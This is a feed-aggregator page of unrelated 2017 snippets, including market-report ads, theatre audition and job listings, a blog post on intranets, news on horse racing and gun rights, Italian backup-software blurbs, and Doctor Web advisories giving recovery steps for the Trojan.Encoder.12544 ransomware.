              Global Hexamethylene Triamine Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022   
    Global Hexamethylene Triamine Sales Market 2017 Product Type, Segmentation, Size, Industry Trends, Specification and Forecast to 2022 The report’s analysis is based on technical data and industry figures sourced from the most reputable databases. Other aspects that will prove especially beneficial to readers of the report are: investment feasibility analysis, recommendations for growth, investment return analysis, trends

              Upcoming Non-Equity Auditions Sunday, Jun. 18   
    Below are BroadwayWorld.com's upcoming listings of Non-Equity Auditions, as of Sunday, June 18, 2017 onwards. Catch up below on anything that you might have missed from today on BroadwayWorld.com!

    To browse the complete listings, sign up for email alerts and more, click here.

    6/19/2017 - 6/21/2017 Full Cast in Memphis: The Musical at The Kelsey Theatre
    Click Here for More Information

    6/19/2017 - 6/27/2017 Actors, Singers, Dancers in Funny Girl at The Candlelight Theatre
    Click Here for More Information

    6/19/2017 - 6/20/2017 Non-Equity Performers in MIRACLE ON 34TH STREET at Weston Friendly Society
    Click Here for More Information

    6/19/2017 - 6/20/2017 Non-Equity Actors in NUTS at Buck Creek Playhouse
    Click Here for More Information

    6/19/2017 Non-Equity Actors in CHAPTER TWO (NJ) at Pegasus Theatre Project
    Click Here for More Information

    6/19/2017 - 6/25/2017 Non-Equity Performers in EVIL DEAD THE MUSICAL at The Barnstormers
    Click Here for More Information

    6/20/2017 - 6/21/2017 Non-Equity Actors in THE ODD COUPLE at The Elmwood Playhouse
    Click Here for More Information

    6/20/2017 - 6/21/2017 Non-Equity Performers in STRANGEST THINGS! THE MUSICAL at Random Acts
    Click Here for More Information

    6/20/2017 - 6/22/2017 Non-Equity Actors in JEFF FORT AND FRED HAMPTON: A REVOLUTIONARY LOVE STORY at Truth Productions
    Click Here for More Information

    6/21/2017 OPEN in HOLLAND AMERICA LINE at RWS Entertainment Group
    Click Here for More Information

    6/21/2017 - 6/25/2017 Non-Equity Performers in JOSEPH AND THE AMAZING TECHNICOLOR DREAMCOAT at Theatre Unlimited Performing Arts
    Click Here for More Information

    6/22/2017 Actors and Singers in Merrily We Roll Along at The Ultimate Search Theater Comapny
    Click Here for More Information

    6/22/2017 Singers, Dancers, Actors in DREAMGIRLS at Lower ossington theatre
    Click Here for More Information

    6/23/2017 - 6/24/2017 Non-Equity Student Performers in SEUSSICAL, THE MUSICAL at Dare to Defy Productions
    Click Here for More Information

    6/23/2017 - 6/24/2017 Non-Equity Performers in INTO THE WOODS at GetUp Stage Company
    Click Here for More Information

    6/24/2017 - 6/25/2017 Non-Equity Child Performers in A CHRISTMAS CAROL at Cincinnati Playhouse in the Park
    Click Here for More Information

    6/24/2017 - 6/25/2017 Non-Equity Performers in THE ENSEMBLE THEATRE 2017-18 SEASON at The Ensemble Theatre
    Click Here for More Information

    6/24/2017 Non-Equity Actors in AFTER THE FALL at Aux Dog Theatre
    Click Here for More Information

    6/24/2017 Actors in African-American Shakespeare Company's 2017/18 Season at African-American Shakespeare Company
    Click Here for More Information

    6/24/2017 - 6/25/2017 Non-Equity Actors in LOST IN YONKERS at Heritage Players
    Click Here for More Information

    6/24/2017 Non-Equity Performers in KISS ME, KATE CONCERT **Date Change** at Bay Street Theater
    Click Here for More Information

    6/25/2017 - 6/26/2017 Non-Equity Actors in DESIRE UNDER THE ELMS at Firehouse Theatre
    Click Here for More Information

    6/25/2017 OPEN Singers in UN BALLO IN MASCHERA at Opera Mariposa and the Heroic Opera Company
    Click Here for More Information

    6/25/2017 - 6/26/2017 Non-Equity Performers in OVER THE RIVER AND THROUGH THE WOODS at Town Players
    Click Here for More Information

    6/25/2017 Non-Equity Performers in THE BEST LITTLE WHOREHOUSE IN TEXAS at Sutter Street Theatre
    Click Here for More Information

    6/26/2017 - 6/27/2017 Non-Equity Actors in SEX PLEASE WE'RE SIXTY at Waukesha Civic Theatre
    Click Here for More Information

    6/26/2017 Non-Equity Actors in ON GOLDEN POND at Riverside Center for the Performing Arts
    Click Here for More Information

    6/26/2017 Non-Equity Actors in THE MURDER MYSTERY COMPANY at The Murder Mystery Company
    Click Here for More Information

    6/26/2017 Non-Equity Performers in SISTER ACT at The Way Off Broadway Dinner Theatre
    Click Here for More Information

    6/26/2017 - 6/27/2017 Non-Equity Performers in LITTLE SHOP OF HORRORS at The Vagabond Players
    Click Here for More Information

    For more Non-Equity Auditions, click here.
              Administrative Assistant III   
    TX-Dallas, Job Description: Advanced administrative responsibilities include preparation of more complex reports/presentations and analysis using various software packages and databases. Is considered a specialist in the department or division, responsible for a complete process of complex nature. Duties will include determining methods and procedures used to accomplish tasks. Hours: 8:00am to 5:00pm Work We
              GreenPlum Developer   
    TX-Dallas, Position: GreenPlum Developer Location: Dallas, TX Duration: FULL TIME Salary: Open Description: Minimum of 5 years experience in distributed application development and system analysis. Hands on exp on GreenPlum Database Experienced in RDBMS – like Oracle Experience in Oracle development (PL/SQL Procedures and Functions, Triggers, Table and Record type variables advance PL/SQL) Experienced in wri
              Intranets and social computing - first mover disadvantage?   
    As you may know, in the past I worked at Ernst & Young in their Centre for Business Knowledge, the group who are responsible for the “KWeb” intranet. Outside of the top tier accounting firms (who have always understood they are involved in knowledge work), I’ve yet to find any large organisations with such a cohesive or advanced intranet, so I like to track public case studies and articles about Ernst & Young’s intranet and knowledge management program to see how it is progressing since I left in 2004.

    Anyway, I was interested to read on the Intranet Benchmarking Forum’s blog that they had recently attended a leadership conference to provide a briefing on:
    the latest trends amongst advance intranets and to parlay that information into a strategic roadmap for a next-generation intranet.
    Alas, we don’t hear much about the audience’s reaction to these trends. I wonder how well E&Y’s intranet does benchmark against those trends, because there wasn’t really a lot there that struck me as new. I must admit this actually irritates me slightly - and I’ll apologies if there is a touch of arrogance here - but it really is time that the intranet industry takes a long hard look at itself and admits that its not really a case that some organisations are facing a set of new trends, they are really just catching up with innovation in other organisations that’s been taking place over the last decade or more.

    Lets look at this apparently emerging issue about the “conflict between the desire to open up will be tempered by risk management and control”, as by its very nature the KWeb intranet is an open system that runs primarily on user-generated content. While I worked there, E&Y had hundreds of unmoderated, unfiltered discussion forums and thousands of project team databases. I don’t recall any major incidents, although I do remember some of the conversations about e-commerce getting quite heated! The only moderation processes that did exist was for the minority of ‘highly filtered’ knowledgebases, like PowerPacks - however, this moderation was for content quality.

    Fast forwarding to the present day, this is only appearing to be a trend now in other less progressive organisations as Web-based collaboration tools (like SharePoint) have started to muscle into the traditional intranet space (e.g. static pages of content pushed at users to eagerly consume).

    But its not a trend pointing to the future, its an indicator that you are lagging behind in how you imagine what an intranet should be. On the other hand I suspect Ernst & Young and those like it aren't lacking vision, but they may be struggling to take advantage of new Web 2.0 inspired enterprise technologies because of what’s in place already.

    Another former employer, CSC, is a large organisation and presents another interesting case study from this point of view. They have a well established extranet, rather than an intranet, with a portal as a primary front end to multiple Web-based systems and sub-sites. However, while they are in the process of adopting social computing tools they face the challenge of integrating them into that existing Web 1.0-style extranet infrastructure.

    I've seen similar situations in other large organisations I've worked with, particulary those that already valued collaboration and that had already deployed first generation Web-based collaboration tools.

    From this I think there are in fact two key positions to understand:
    1. Progressive, early adopter organisations may now be at a disadvantage at a technology level, because they have lots of expensive legacy infrastructure to deal with - however, the culture is much better prepared to adopt a social computing-based intranet, so you can use that to your advantage. Luckily social computing can help make that transition in a cost effective way.
    2. Laggard organisations (and smaller organisations that never had access to enterprise groupware in the first place) have a temporary advantage to get ahead of the original early adopters if they can get past the cultural and business political issues that stop them from introducing new collaboration and social computing-based intranets. Its a lot harder to bootstrap culture change, but with a bit of effort you can fly under the radar at the technology level with social computing if you try. But fundamentally, you have to reinvent what the intranet means to your organisation in order to move forward.
    So, what’s your organisation - an original early adopter or are a laggard?

    Tags: , , , , , , ,
              IT Manager - Benchmark Basking Ridge - Basking Ridge, NJ   
    Assist in the maintenance, support and monitoring of property wide systems such as Delphi network and database, Maestro, Agilysys, Avaya, V ingcard, Fios,...
    From Benchmark Hospitality International - Tue, 13 Jun 2017 19:02:23 GMT - View all Basking Ridge, NJ jobs
              Data Entry Clerk 2616   
    AZ-Tempe, Job Description: Receive all documents and enter the data into the on-line system on the PC. Operate a data entry device to input and maintain lists and records. Create and update databases. Maintain a daily count of all claims processed. Typical years experience in field of 1-3 years. Typically holds GED or High School Diploma. This will be part of a image review project where operators will be r
              Comment on [Umbraco Deployment] Exporting MS SQL CE Database to MS SQL Server Express by ErikEJ   
    Actually, do not use the with BLOBs option, you will loose data if you do!
              Salesforce Administrator - TD Sports Group, LLC - Sacramento, CA   
    * Database management * Email blasting * Email blast response management This job is on a contractual as-needed basis. Job Type: Contract Required
    From Indeed - Fri, 16 Jun 2017 16:07:51 GMT - View all Sacramento, CA jobs
              Not Everyone’s a Winner - By Evan Hammonds   

    It’s not unusual to have two winners of a Thoroughbred race—even with advanced photo-finish equipment dead heats happen every once in a while, and we’re a little surprised they don’t happen more often. However, it’s hard to fathom how there are two “winners” of a race when they are four lengths apart at the wire, but that is exactly what racing officials in Pennsylvania are trying to lead us to believe.

    In perhaps one of the more interesting rulings to come from a state racing authority, the State Horse Racing Commission Bureau of Thoroughbred Horse Racing in Pennsylvania declared last month there would be not one, but two winners of the 2016 Parx Oaks.

    In last year’s Parx Oaks, run May 7, Main Line Racing Stable and Joshtylane Farm’s Miss Inclusive—trained by John Servis—finished first by four lengths but was later disqualified for testing positive for clenbuterol. Gryphon Investments’ Eighth Wonder was elevated to first and the $60,000 winner’s share of the purse was redistributed. Servis was handed a 15-day suspension.

    However, an amended ruling dated May 19, 2017, signed by bureau director Tom Chuckas, the commission stated that: “Miss Inclusive shall be deemed to have finished first along with the horse Eighth Wonder, for the purpose of both maintaining each horse’s racing record and determining each horse’s eligibility to enter in future races, the forfeiture of the purse will remain in effect and the redistribution of the purse will stand and the 15-day suspension shall be modified to a $5,000 fine.”

    In this unprecedented move the commission has allowed for both horses to be listed as the “winner” of the black type race (while the connections of Eighth Wonder retain the purse), along with a second-place finisher and a third-place finisher.

    Say what?

    The implications here go far beyond just the black-type that will appear on catalog pages for decades to come.

    It’s more about rules—not only making them, but enforcing them instead of bending them. If a commission doesn’t deem its rules of racing regarding medication overages—or any other infraction for that matter—fair, then seek to change them, but by all means enforce them.

    In an effort to stem the ramifications of the ruling nationally, Equibase, the industry-owned database of racing information and statistics, took its own action. On June 2 Equibase removed the official chart of the 2016 Parx Oaks, placing it under review and issuing a statement.

    “Equibase has removed the official chart for this race from its website while we review the implications of this matter on our database and how the database should reflect the race results,” said Jason Wilson, president and COO of Equibase. “We view the integrity of the results and the data, and the clarity with which we can present it, to be paramount in this regard. We will inform the industry when a final determination about the official Equibase chart has been made.”

    The move by Equibase—equally unprecedented—follows on the heels of the reintroduction of the Horseracing Integrity Act of 2017 by Reps. Andy Barr (R-Ky.) and Paul Tonko (D-N.Y.). The Jockey Club’s James Gagliano makes a case for the federal legislation, pointing to several recent incidents, including the Pennsylvania ruling.

    While there is a difference of opinion among racing’s many factions regarding the federal bill, certainly we can all agree on racing’s need for a “level playing field.” And that should apply to what goes on in the stable area and the racetrack as well as in any commission meeting.

    State-based regulation—the status quo—may have worked once upon a time, but the malt shop closed a long time ago.This sport, long since national, has gone global. The time has come for national cohesiveness in the rules, regulations, and penalties in Thoroughbred racing.

              US Supreme Court Rejects Gun Rights Appeal   


    The United States Supreme Court has rejected another call to decide whether Americans have a legal right to carry guns outside their homes.

    The high court released rulings on a number of cases Monday. But it refused to hear a case against a California law that sets limits on carrying guns in public.

    The high court left in place an appeals court ruling in the case.

    The appeals court confirmed the legality of a measure to limit permits for concealed weapons -- those placed out of sight.

    The Supreme Court ruled in 2008 that the United States Constitution guarantees the right to carry a gun, at least for self-defense at home. But the court has refused repeated requests to expand on its understanding of gun rights.

    More than 40 states already have rules giving gun owners a right to be armed in public.

    A new study shows that Americans are as deeply divided about gun policy as they are about immigration, health care and other issues.

    The Pew Research Center questioned 3,900 people nationwide. The resulting study found sharp differences of opinion between gun owners and those who do not own guns.

    The study found that more than half of owners support creation of a federal database for recording gun sales. Eighty percent of those who do not own guns also support such an effort.

    About half of gun owners support a ban on assault weapons, compared to almost 80 percent of non-gun owners.

    Assault weapons have been compared to guns used in armed conflicts. Gun control activists say such weapons are meant to kill multiple people quickly, and not for civilian use.

    Yet there was common ground among gun owners and non-gun owners on other issues.

    Nearly 90 percent of all those questioned believe the government should bar the mentally sick from purchasing guns.

    Also, about 80 percent of those who own guns believe people named on federal no-fly or watch lists should be prevented from buying guns.

    Strong majorities of both groups support background investigations of those who buy guns from an individual or at gun shows.

    The study also found that at least two-thirds of Americans have lived in a home with a gun. About half of those questioned who have never owned a gun said they had fired one.

    About 1,300 of the 3,900 people questioned said they own guns. The rest said they did not.

    Most of the gun owners described themselves as white males who are members of the Republican Party.

    The study found that people who live in the Northeastern United States are less likely to own a gun than are people in other parts of the country.

    I’m Caty Weaver.

    Wayne Lee wrote this story for VOANews.com. Christopher Jones-Cruise adapted it for Learning English. George Grow was the editor.

    We want to hear from you. Write to us in the Comments Section, or visit our Facebook page.

    Words in This Story

    concealed – adj. hidden from sight

    database – n. a collection of pieces of information that is organized and used on a computer

    assault weapon – n. a gun that can shoot many bullets quickly and that is designed for use by the military

    multiple – adj. more than one​; many

    background – n. the experiences, knowledge, education, etc., in a person’s past

              IObit Uninstaller   

    IObit Uninstaller offre il modo più facile e veloce a disinstallare i programmi eplugin di browser. Con la Scansione Potente e il Disinstallazione Potenziata, tutti gliresidui possono essere rimossi completamente dal tuo computer come non sono statiinstallati mai sul tuo PC. Inoltre, IObit Uninstaller presta più attenzione ai pluginmaligni del browser, al toolbar, e ai programmi iniettati per proteggere la sicurezzaonline del tuo PC. Utilizzando IObit Uninstaller, riesci a rimuovere i plugin o toolbarmaligni e indesiderati, i quali non possono essere rilevati dal programma anti-spyware.Queste le principali novità implementate nell'ultima versione: Aggiunta la rimozione di plugin ed estensioni di Microsoft Edge. Database più ampio per rimuovere più plugin maligni e pubblicitari per il browser più sicuro e più rapido. Supportata disinstallazione di più di 4,000 programmi ostinati e plugin di browser. Scansione Approfondita più profonda e più veloce. Migliore supporto per la disinstallazione delle app di Windows. Ottimizzato il controllo in tempo reale dei residui rimasti da altri terzi programmi di disinstallazione. Supportati 2 temi e aggiunta una nuova carattere più grande per la migliore esperienza di utente. Supportate 38 lingue. Ulteriori novità possono essere scoperte da te.

              Uranium Backup   

    Uranium Backup è un software completo per la gestione del backup automatizzato deidati del proprio sistema, compatibile con sistemi operativi Windows, compreso Windows 7,disponibile in 9 lingue: Italiano, Inglese, Spagnolo, Polacco, Francese, Olandese,Tedesco, Russo, Portoghese Brasiliano.

    Cosa fa Uranium Backup Disaster Recovery (Drive Image backup e Bare Metal restore)
    Uranium può eseguire immagini complete del disco di sistema per consentire un ripristino in blocco del sistema operativo e di tutte le impostazioni (bare metal restore). Disponibile su sistemi operativi Vista, Server 2008 e Windows 7 Backup su Tape
    Il software di backup su nastro tra i più semplici e versatili al mondo. Compatibile DAT, DDS, DLT, SDLT, AIT, VXA, LTO, ecc... Compatibile con qualsiasi Tape (SCSI, IDE, USB, SAS, ecc...). La soluzione più semplice e conveniente per backup su tape su Windows Vista e Server 2008. (leggi il tutorial ->) Masterizzazione su CD e DVD
    Backup mediante masterizzazione su CD e DVD. Scrive anche su DVD-RW, DVD-RAM e DVD+R DL (doppio strato); può creare dischi multisessione e file ISO. Backup di database SQL Server
    Backup di database Microsoft SQL Server (inclusi Express Edition e MSDE) con compressione zip integrata. Consente di pianificare il backup di un numero illimitato di database e di copiare i file di backup su Tape, DVD, FTP, LAN, ecc... (leggi il tutorial ->) FTP e SFTP - Upload e Download
    Invio dei backup su server remoti con compressione zip e criptazione, aggiornamento pianificato e automatizzato (upload) di siti web, download di siti web, Client FTP e SFTP. (leggi il tutorial per scaricare siti web ->) Backup su disco, compressione zip, sincronizzazione
    Copia di file e cartelle su dischi locali, hard disk esterni usb o firewire, server NAS, iOmega REV Drive, RDX drive, altri pc in rete. Con la possibilità di compressione zip, criptazione, eliminazione file vecchi e con un numero elevato di opzioni. Pianificazione backup automatici
    Possibilità di pianificare l'esecuzione dei backup in base a gioni ore, minuti. Schedulazione integrata ed esecuzione in background come servizio. Invio notifiche via e-mail
    Invio automatico dei report via e-mail ad uno o più indirizzi, per essere sempre avveriti del buono o cattivo esito delle procedure di backup. Backup di server virtuali
    Possibilità di eseguire backup di macchine virtuali Hyper-V, VMware ESX/ESXi/vSphere Backup su tape Backup di database MySQL e MariaDB

    E inoltre: Esecuzione come Servizio Volume Shadow Copy - Copia dei file bloccati (XP, 2003, VISTA, 2008, 7) Criptazione AES 256 bit Backup via E-Mail - Invio dei backup tramite e-mail e allegato zippato Copia di file e cartelle da infinite sorgenti a infinite destinazioni Sincronizzazione con possibilità di eliminazione vecchi file (mirroring) Compressione Zip 64 incrementale - Creazione di archivi zip di grandi dimensioni Portabile e leggero - Funziona anche senza installazione e non ha bisogno di alcun requisito Sicurezza, affidabilità e prestazioni con un bassissimo uso delle risorse di sistema Compatibile con Windows: XP / 2000 / 2003 / 2008 / Vista / 7 - 32 e 64 bit

    Nuove caratteristiche Nuovo backup incrementale/differenziale di file e cartelle Migliori performance (sia dell’interfaccia che delle operazioni di backup) Backup di VM sia ESX(i) che Hyper-V molto più affidabile E’ ora possibile eseguire il backup completo di cassette di posta Exchange (migliora le prestazioni significativamente su SBS 2011) E’ ora possibile eseguire il backup di file e cartelle cifrate con BitLocker E’ ora possibile comprimere (ZIP) file e cartelle con percorsi più lunghi di 256 caratteri E’ ora possibile testare l’installazione del servizio durante il periodo di prova gratuita

    Bug risolti Miglioramenti minori e bug fix (mai più loop FTP, mai più problemi di autenticazione delle cartelle e molto altro)

              Iperius Backup   

    Iperius Backup è la soluzione completa per la salvaguardia dei dati aziendali e per laprotezione dei dati riservati. Le numerose funzioni, la sua flessibilità e i tanti tipidi backup ne fanno una utility a 360 gradi per backup e trasferimento di dati. Compatibilecon Windows 8 e Server 2012, installazione come servizio, notifiche e-mail, copia dei fileaperti, sincronizzazione e un numero incredibile di tipi di backup.

    Iperius Backup può fare backup su svariati dispositivi, e include funzioni di DriveImaging (disaster recovery), backup su Tape DAT e LTO, backup su NAS e RDX, backup sudischi esterni USB, backup di database SQL Server, MySQL, MariaDB, PostegreSQL e Oracle,Backup FTP (Upload e Download), compressione zip, sincronizzazione file e backup online suspazi Cloud Google Drive, OneDrive, Dropbox, Amazon S3 e Microsoft Azure. Può inoltreeseguire backup di macchine virtuali VMware ESXi o Hyper-V

    Novità di questa versione: Compatibile con Windows Server 2016 e SQL Server 2016 Notevolmente velocizzato e migliorato il backup FTP in upload, specie con connessioni multiple e nel backup FTP su NAS in rete locale. Migliorate procedure di ricollegamento automatico nei backup FTP Aggiornamento librerie SSL Ora nelle destinazioni FTP e Cloud viene mostrato anche il sotto percorso (lista delle destinazioni) Aggiornamento procedure di backup MySQL e PostgreSQL Aggiunto pulsante per testare il collegamento alla Web Console Ora l'ultima pianificazione rimane memorizzata anche se disabilitata Aggiunta possibilità di avviare un backup manualmente ma mediante il servizioBackup di Exchange: Iperius può eseguire il backup a caldo di server di posta Exchange, in modalità immagine con troncamento dei log, e/o con esportazione di singole cassette di posta su file PST. Consente inoltre il Restore granulare di mailbox singole da file PST.

              Comment on Ubuntu One by Top cpanel reseller web hosting in Mayang Imphal   
    It is essential to supply customers having a summary page of these orders to allow them to review all of the details before making the purchase. Internet nnot merely adds towards the luxury and comforts in your lifetime but also provides an ample space for earning your livelihood too. In addition, their reseller plans have site builder software, 32 self installing PHP scripts, FTP accounts, and My - SQL databases. This is done through the use of reseller website hosting. There are a level of very good factors why individuals are getting associated with running their oown companies online. If you are seeking cheap and reliable internet hosting, VPS is for you. The Web hosting India service commences with buying your own personal Uniform Resource Locator (URL). You don't really must do a much more work to earn that additional income. A site is an individual with the most widespread advertising and marketing instruments utilised by around date entrepreneurs in buy to succeed in and seize a wider purchaser base for solutions and services. But in case you hqve signed up totally free service these ads could be annoying sometimes.
              Big Data Market: Embracing Data to Transform Healthcare and Pharma Commercial Strategy - Featuring Expert Panel Views from Industry Survey 2016   

    Big Data: Embracing Data to Transform Healthcare and Pharma Commercial Strategy - Featuring Expert Panel Views from Industry Survey 2016"" provides a comprehensive analysis of the Big Data landscape. GBI Research conducted an extensive industry survey of 73 experts from the pharmaceutical and healthcare industries.

    Pune, Maharashtra -- (SBWIRE) -- 02/09/2017 -- Big Data Market Embracing Data to Transform Healthcare and Pharma Commercial Strategy - Featuring Expert Panel Views from Industry Survey 2016"" provides a comprehensive analysis of the Big Data Market landscape.  Report conducted an extensive industry survey of 73 experts from the pharmaceutical and healthcare industries - including both organizations that already utilize Big Data Market and those that do not. Our survey gathered experience and opinion on the use of Big Data Market, and insights on key trends for the present and future use of the technology within healthcare.

    Big Data Market refers to any data set that is too large to store, process or analyze using traditional database software and hardware. It can have a significant impact on all aspects of the pharmaceutical and healthcare sector, and companies are making large investments to leverage the technology more effectively.

    Browse more detail information about Big Data Market


    The report features an overview of Big Data Market and its place within healthcare. It examines the factors driving and necessitating the use of the technology within this industry, and provides detailed examples of how different Big Data Market sources and analytics techniques could be used to provide direct benefits to pharmaceutical companies, healthcare institutions and patients.

    Big Data Market Scope:

    - What is Big Data Market? What is its place within healthcare, and what are the main data sources?

    - How prevalent is the use of Big Data Market in healthcare?

    - What are the main driving factors necessitating the use of Big Data Market in healthcare? What is the relative importance of these factors according to industry?

    - What are examples of the commercial benefits that the use of Big Data Market and analytics can provide, in different aspects of the industry?

    - What are the main challenges associated with Big Data Market in healthcare? What is the relative importance of these factors according to industry? For the organizations that do not yet utilize Big Data Market, what specific reasons have led to their decision not to do so?

    - How do major pharmaceutical and healthcare companies use Big Data Market in the real world? What are some of the main partnerships between Big Pharma and technology companies? What is the underlying technical architecture of Big Data Market in healthcare?

    - What is the likelihood that organizations that already use Big Data Market will increase their investment within the next five years? Will those that do not currently invest in the technology begin doing so in the next five years?

    - How can Big Data Market be effectively implemented within an organization?

    Get a PDF Sample of Women health:


    Reasons to Purchase:

    Healthcare report will allow clients to have an understanding about market opportunities and competitive analysis and forecast on the women's healthcare industry. Interested clients will get a view on how therapies are developing for changing conditions and all the key factors that play together to affect or improve women's health.

    Have any query? ask our expert @ http://www.absolutereports.com/enquiry/pre-order-enquiry/10529057    

    Detailed TOC of Big Data Market - Assessing the Need for a Targeted and Specialized Approach

    1 Big Data Market Overview 9
    - What is Big Data Market? 9
    - The 'Three Vs' of Big Data Market: Volume, Velocity and Variety 9
    - The Sources of Big Data Market in Healthcare 10
    - Big Data Market Lifecycle 12
    - How Prevalent is the use Big Data Market in Healthcare? Results from our Industry-Wide Survey 13

    2 Drivers of Big Data Market in Healthcare 17
    - Advances in Technology: Explosion in Data Generation 17
    - Next-Generation Sequencing Technologies: Outpacing Moore's Law 17
    - Proteomic Databases: ProteomicsDB Designed with Big Data Market Analytics in Mind 18
    - Electronic Health Records: A Form of Big Data Market 19
    - Social Media: Information That Cannot Be Found Anywhere Else 19
    - Devices: Smartphones, Wearables and Telemedicine Devices Represent a Continuous Source of Big Data Market 20
    - Cloud Technologies: Often Integral to Big Data Market 20
    - Needs and Trends Driving the Use of Big Data Market in Healthcare 21

    3 Commercial Implications of Big Data Market in Healthcare 27
    - Predictive Modeling: Fundamental Source of Big Data Market's Power 27
    - Using Big Data Market for Patient-Specific Modeling: Potential for Huge Healthcare Savings 28
    - Big Data Market Unlocks the Potential of Personalized Medicine and Targeted Therapies 28
    - Utilizing the Unique Big Data Market Provided by Wearables and Fitness Trackers 29
    - Big Data Market for a More Systemic Approach to Drug Repositioning 29
    - Drug Discovery and Pre-Clinical Trials: Big-Data-Guided Drug Development 29

    4 Appendix 63
    - GBI Industry Survey: Breakdown of Respondents by General Industry 63
    - GBI Industry Survey: Breakdown of Respondents by Specific Sector 63
    - GBI Industry Survey: Breakdown of Respondents by Region 63
    - GBI Industry Survey: Proportion of Healthcare Organizations that Currently Utilize Big Data Market 64
    - GBI Industry Survey: Big Data Market Utilization in Healthcare, Comparison of Expert Panels from Europe, North America and Asia 64
    - GBI Industry Survey: Most Important Factors Promoting the Use of Big Data Market in Healthcare 65
    - GBI Industry Survey: Most Important Factors Promoting Big Data Market, Pharmaceutical Expert Panel vs Overall Healthcare Expert Panel 65
    - GBI Industry Survey: Most Important Factors Promoting Big Data Market, Regional Breakdown 66
    And Continue..

    Get Discount on Big Data Market:

    About Absolute Report
    Absolute Reports is an upscale platform to help key personnel in the business world in strategizing and taking visionary decisions based on facts and figures derived from in-depth market research. We are one of the top report resellers in the market dedicated towards bringing you an ingenious concoction of data parameters.

    For more information on this press release visit: http://www.sbwire.com/press-releases/big-data-market-embracing-data-to-transform-healthcare-and-pharma-commercial-strategy-featuring-expert-panel-views-from-industry-survey-2016-769494.htm

    Media Relations Contact

    Ameya Pingaley
    Absolute Reports
    Telephone: 408-520-9750
    Email: Click to Email Ameya Pingaley
    Web: https://www.absolutereports.com/big-data-embracing-data-to-transform-healthcare-and-pharma-commercial-strategy-featuring-expert-panel-views-from-industry-survey-2016-10529057

              Instructions for users affected by Trojan.Encoder.12544   

    June 28, 2017

    Trojan.Encoder.12544 spreads by exploiting the SMB v1 vulnerability - MS17-010 (CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148), which can be leveraged using the NSA "ETERNAL_BLUE" exploit. TCP ports 139 and 445 are used to disperse the Trojan. This “remote code execution” vulnerability enables attackers to remotely infect targeted computers.

    1. To regain access to Windows, you need to recover the MBR (you can use the standard procedure in the Recovery Console and launch bootrec.exe /FixMbr).

      You can also restore the boot record using Dr.Web LiveDisk — create a bootable CD or USB drive, boot up from that media, launch the Dr.Web scanner, check the compromised hard drive for viruses, and choose Cure for all the infected files.

    2. After that disconnect your PC from the network, boot up, and apply the patch MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx.

    3. Then install Dr.Web, establish a connection to the Internet, update the virus databases, and run a full system scan.

    Trial for home users Trial for businesses

    The Trojan replaces the MBR (Master Boot Record), and schedules and executes a system restart task. After that the OS won't boot up because the Master Boot Record has been compromised. Data starts being encrypted as soon as the system restart is scheduled. A separate AES key is generated for each drive. The key persists in the memory until the disk is completely encrypted. It is encrypted using a public RSA key and then deleted. If the MBR is replaced successfully, the MFT file is also encrypted once the system restarts. The file contains information about all the files on an NTFS drive. Once all these procedures are complete, the data can only be recovered using a private key. Therefore, without that key no files can be recovered.

    As of now, decryption is not available. Our analysts are researching the problem and looking for a solution. We will notify you once a final determination has been made.

              A new encryption ransomware attacking Russian and Ukrainian companies   

    June 27, 2017

    Information about a new outbreak of an encryption ransomware appeared. The Trojan affected oil, telecommunication and financial companies in Russia and Ukraine. Doctor Web informs users that the new encoder is detected by Dr.Web products.

    According to data of our information security specialists, the Trojan is distributed independently, just as infamous WannaCry. Yet there is no precise data if it uses the same distribution mechanism. At present, our security researchers examine the new Trojan; we will give the details later on. Some mass media sources draw parallels with the ransomware Petya (in particular, Dr.Web detects it as Trojan.Ransom.369) due to the external side of the ransomware operation. However, a distribution method of the new threat is different from the standard pattern of Petya.

    Today, on June 27 at 4.30 p.m., this encryption ransomware has been added to Dr.Web virus databases as Trojan.Encoder.12544.

    Doctor Web advises all users to be vigilant and refrain from opening suspicious emails (this measure is required but is not fully sufficient). It is necessary to make backup copies of critically important data and to install all software security updates. Availability of an installed anti-virus is also crucial.

              Global Database Encryption Market Report 2017-2022: Analysis By Database Operational Model, Deployment Type & Database Encryption Type   
    ...DUBLIN , June 28, 2017 /PRNewswire/ -- Research and Markets has announced the addition of the "Global Database Encryption Market Analysis 2017 - Forecast to 2022" report to their offering. Logo The report contains up to date financial data derived from varied research sources ...

              Stage: Stagiair(e) Digital Marketing in Ypenburg   
    <p>Voor het hoofdkantoor zijn wij <strong>per september 2017</strong> voor minimaal 5 maanden op zoek naar een:</p> Stagiair(e) Digital Marketing <p>Wij zijn verantwoordelijk voor de branding en marketing van Nederland in binnen- en buitenland. Via het merk 'Holland' zetten wij Nederland op de kaart als aantrekkelijke bestemming voor vakanties, zakelijke bijeenkomsten en congressen.</p> <p>Voor de wereldwijde promotie van Nederland zijn wij actief in Europa, (Zuid-)Amerika en Azie. Op het hoofdkantoor in Den Haag (40 medewerkers) wordt de marketingstrategie voor Holland bepaald en worden campagnes ontwikkeld. De NBTC-vestigingen in de diverse landen zijn verantwoordelijk voor de lokale marktbewerking en uitvoering van de marketingcampagnes. </p>   <p>De afdeling Digitale Marketing is een eigenzinnige afdeling die de hele dag denkt vanuit de behoefte van de buitenlandse bezoekers op de Holland-kanalen. We proberen hun behoefte te identificeren en ze te verleiden om hun vakantie naar Nederland te boeken. We weten al veel van de buitenlandse bezoekers, zoals de gebruikte zoekwoorden. Daarnaast hebben we ook hun koopstijlen in kaart gebracht en segmenteren ze real time. Hierdoor kunnen we jaarlijks meer dan acht miljoen buitenlandse bezoekers heel specifiek van informatie voorzien en stimuleren we daarmee hun bezoek aan Nederland.</p> <p>Voor onze vijftien meertalige websites werken we met een content database van ongeveer 1250 bronartikelen die dynamisch in context tot elkaar getoond worden. Dit doen we door deze artikelen te taggen met termen uit de taxonomie. Dit laatste is voor het laatst in 2011 goed onder de loep genomen en hier willen we in 2017 weer eens goed naar kijken. Ook omdat we onze navigatiestructuur willen veranderen en hier weloverwogen beslissingen in willen nemen.</p> Stage-inhoud <p>Tijdens de stage werk je mee aan het verbeteren van de website op het gebied van:</p> <ul> <li><strong>SEO</strong></li> <li>Hoe worden we goed gevonden in Google?</li> <ul> <li>Over welke onderwerpen kunnen we nog meer en beter schrijven?</li> </ul> <li><strong>Boekingen</strong></li> <ul> <li>Hoe zorgen we dat ons boekbare aanbod nog beter wordt uitgelicht?</li> <li>Hoe krijgen we het conversiepercentage hiervan 